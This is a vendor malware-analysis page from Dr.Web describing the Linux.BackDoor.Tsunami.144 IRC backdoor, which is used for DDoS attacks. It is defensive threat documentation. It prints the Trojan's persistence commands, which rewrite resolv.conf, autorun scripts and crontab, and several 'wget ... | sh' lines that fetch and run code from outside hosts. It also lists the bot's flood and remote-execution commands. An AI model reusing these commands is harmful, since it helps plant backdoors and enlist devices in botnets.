FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.BackDoor.Tsunami.144

Added to the Dr.Web virus database: 2015-07-16

Virus description added:

SHA1:

  • e8a8d48e1083e7146d5efcba1d6490f05cd8c897 (unpacked)
  • 577551c6a550c3fd30169fb4c2a62fa8b6e73686 (packed)

Backdoors for Linux OSes that get installed on the system by Linux.PNScan.1. Once launched, the Trojan attempts to ensure its autorun as follows:

system("echo \"nameserver 8.8.8.8\" > /etc/resolv.conf &");
system("rm -rf /var/run/wgs* > /dev/null 2>&1 &");
system("rm -rf /var/run/bbs* > /dev/null 2>&1 &");
system("rm -rf /var/run/tty* > /dev/null 2>&1 &");
system("ulimit -s unlimited > /dev/null 2>&1 &");
system("mount -t ext2 /dev/mtdblock4 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/mtdblock5 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdx6 /tmp/config > /dev/null 2>&1");
system("mount -t ext2 /dev/sdc6 /tmp/config > /dev/null 2>&1");
system("rm -rf /var/run/getty1 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty2 > /dev/null 2>&1 &");
system("rm -rf /var/run/getty3 > /dev/null 2>&1 &");
system("cat /tmp/config/autorun.sh | grep -v \"nameserver 8.8.8.8\" | grep -v \"sleep 43200\" | grep -v \"erpcit\" | grep -v \"o.kei\" > /var/run/.backup");
system("echo \"echo \"nameserver 8.8.8.8\" > /etc/resolv.conf\"  >> /var/run/.backup");
system("echo \"sleep 120 && wget -qO - http://*.***.su/qn | sh > /dev/null 2>&1 &\" >> /var/run/.backup");
system("cat /var/run/.backup > /tmp/config/autorun.sh");
system("chmod +x /tmp/config/autorun.sh");
system("umount /tmp/config");
system("rm -rf /var/run/.backup");
system("cat /etc/config/crontab | grep -v \"gettychk\" > /tmp/.fuckw");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckw");
system("cat /tmp/.fuckw > /etc/config/crontab");
system("crontab -l | grep -v \"gettychk\" > /var/run/.fuckx");
system("echo \"* * * * * /var/run/gettychk > /dev/null 2>&1\" >> /var/run/.fuckx");
system("echo \"#!/bin/sh\" > /var/run/gettychk");
system("echo \"pidof getty0 || ( rm -rf /var/run/getty.pid && /var/run/getty0 ) \" >> /var/run/gettychk");
system("chmod 700 /var/run/gettychk");
system("crontab /var/run/.fuckx");
system("crontab /etc/config/crontab");
system("rm -rf /var/run/.fuckw");
system("rm -rf /var/run/.fuckx");
system("/etc/init.d/crond.sh restart > /dev/null 2>&1 &");
system("wget -qO - http://*.***.su/botkill | sh > /dev/null 2>&1 &");

To connect to the IRC server, the Trojan generates the name and alias string as follows:

x32|Linux|root|%c%c%c%c%c%c%c%c%c

where %c indicates a random number from the "0123456789" set. If the backdoor does not have root privileges, the "unk" value is used in place of "root".

While establishing a connection to the IRC server, the malicious program waits for incoming commands. The backdoor can execute the following commands:

CommandActionComments
352Set a fake IP
433Generate a new nickname
ERRORGenerate a new nickname
NICKTake a string from the command as a nickname
PINGSend PONG
376Join the channelSend(fd, "NICK %s\n", nick);
Send(fd, "MODE %s -xi\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
422Join the channelSend(fd, "NICK %s\n", nick);
Send(fd, "MODE %s -xi\n", nick);
Send(fd, "JOIN %s :%s\n", chan, pass);
PRIVMSGExecute a special command

Moreover, the Trojan can execute a number of extended commands.

CommandActionSyntax
RANDOMFLOODRandomly switch between ACK and SYN FloodRANDOMFLOOD <target> <port> <secs>
ACKFLOODACK Flood (spoofed)ACKFLOOD <target> <port> <secs>
SYNFLOODSYN Flood (spoofed)SYNFLOOD <target> <port> <secs>
TSUNAMILaunch a DDoS attackTSUNAMI <target> <secs>
PAN“Advanced” SYN FloodPAN <target> <port> <secs>
SUDPUDP Flood (spoofed)SUDP <target> <port> <secs>
UDPUDP FloodUDP <target> <port> <secs>
NSACKFLOODACK FloodNSACKFLOOD <target> <port> <secs>
NSSYNFLOODSYN FloodNSSYNFLOOD <target> <port> <secs>
STDLaunch a DDoS attackSTD <target> <port> <secs>
UNKNOWNLaunch a DDoS attackUNKNOWN <target> <secs> (recommended for non-root users)
KILLALLTerminate a DDoS attack
DNSIdentify domain and send the server its IP
CUSTOMExecute a custom script (at the specified link)
wget -qO - http://o.kei.su/custom | sh > /dev/null 2>&1
PATCHApply a patch against the shellshock vulnerability
wget -qO - http://o.kei.su/patch | sh > /dev/null 2>&1
BOTKILLRemove other Trojans
wget -qO - http://o.kei.su/botkill | sh > /dev/null 2>&1
GETSPOOFSGet spoofing parameters
SPOOFSSet an IP or an IP range for spoofingSPOOFS <iprange/ip>
VERSIONReturn backdoor's version
SERVERChange the server to the one specified in the command
GETDownload a specified fileGET <url> <save as>
IRCSend specified IRC commands to the serverIRC <arg1> <arg2> <arg...>
HELPDisplay the list of available commands
SHExecute a set of SH commandsSH <arg1> <arg2> <arg...>

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

Dr.Web © Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies